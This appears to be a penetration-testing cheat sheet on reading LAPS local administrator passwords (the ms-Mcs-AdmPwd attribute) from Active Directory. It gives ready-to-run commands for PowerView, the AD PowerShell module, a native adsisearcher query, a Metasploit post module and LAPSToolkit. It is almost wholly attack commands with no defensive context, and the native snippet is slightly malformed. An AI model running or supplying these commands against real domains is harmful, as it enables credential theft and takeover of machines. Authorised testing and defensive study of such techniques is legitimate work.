Laps Password Read

Powerview

Get-NetComputer | Select-Object 'name','ms-mcs-admpwd' Get-DomainComputer -identity -properties ms-Mcs-AdmPwd

PowerShell

Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Object { $_.'ms-Mcs-AdmPwd' -ne $null } | Select-Object 'Name','ms-Mcs-AdmPwd'

Native

([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=)(sAMAccountName=))").findAll() | ForEach-Object { Write-Host "" ; $.properties.cn ; $.properties.'ms-mcs-admpwd'}

Metasploit

use post/windows/gather/credentials/enum_laps

LAPSToolkit

$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

Get-LAPSComputers -Credential $cred